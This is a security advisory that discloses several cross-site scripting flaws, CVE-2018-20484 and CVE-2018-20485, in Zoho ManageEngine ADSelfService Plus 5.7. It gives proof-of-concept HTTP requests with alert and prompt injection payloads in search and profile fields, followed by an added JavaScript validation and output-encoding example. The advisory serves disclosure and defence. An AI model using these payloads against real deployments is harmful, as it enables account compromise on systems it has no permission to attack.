Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting 2019-05-09 21:05:18

[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?


[+] TimeLine
[-] Nov 23, 2018 Reported
[-] Nov 26, 2018 Triaged
[-] Dec 27, 2018 Fixed
[-] May 08, 2019 Public Disclosure

[+] Description:
Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has multiple XSS vulnerabilities.

[+] POC

1- Employee search form

POST /EmployeeSearch.cc?actionId=Search HTTP/1.1

searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
searchType parameter:
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=


2- Employee Search – ascending parameter

/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1

selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=


3- EmpSearch.cc - searchString parameter

POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg/onload=prompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1

&adscsrf=

4- Stored XSS in self-update layout implementation.

/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into the Mobile Number field and save.
Payload: 11111111]";a=alert,a(31337)//
The code executes here:
/Enrollment.do?selectedTab=Enrollment


[+] Assigned CVE: CVE-2018-20484, CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
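
[+] Added example (not part of the original advisory and not the vendor's fix): shape checks for the enumerated parameters named above, plus output encoding for the free-text fields (searchString, Mobile Number). The allowed value shapes, the function names and the assumption that values are reflected into a JavaScript string literal or into HTML are inferred from the PoC requests, not confirmed by the vendor.

```javascript
// Added example. Value shapes are assumptions taken from the benign values
// ("contains", "ALL_FIELDS", "true") in the advisory's requests.
const STRICT_PARAMS = {
  searchType: /^[A-Za-z_]{1,32}$/,
  searchBy: /^[A-Za-z_]{1,32}$/,
  ascending: /^(true|false)$/,
};

// Names of enumerated parameters whose value does not match its expected shape.
function rejectedParams(rawQueryOrBody) {
  const bad = [];
  for (const [name, value] of new URLSearchParams(rawQueryOrBody)) {
    const shape = STRICT_PARAMS[name];
    if (shape && !shape.test(value)) bad.push(name);
  }
  return bad;
}

// Free text placed inside a JavaScript string literal: every UTF-16 code unit
// other than an ASCII letter or digit becomes \uXXXX, so no quote, bracket,
// semicolon or "</script>" sequence survives to end the literal.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Free text placed in HTML element content or a quoted attribute value.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Constructed inputs with the same shape as the requests in the PoC section.
const samples = [
  'searchString=a&searchType=contains&searchBy=ALL_FIELDS&adscsrf=',
  'searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=',
  'sortIndex=0&ascending=true\';a=alert,a(31337)//&searchString=a',
];
for (const s of samples) console.log(rejectedParams(s), '<-', s);
console.log(encodeForJsString('11111111]";a=alert,a(31337)//'));
console.log(encodeForHtml('RR<svg/onload=prompt(8)>'));
```

The shape checks only cover the enumerated parameters; the encoders are what protect free-text fields, and the one applied must match the context the value is written into.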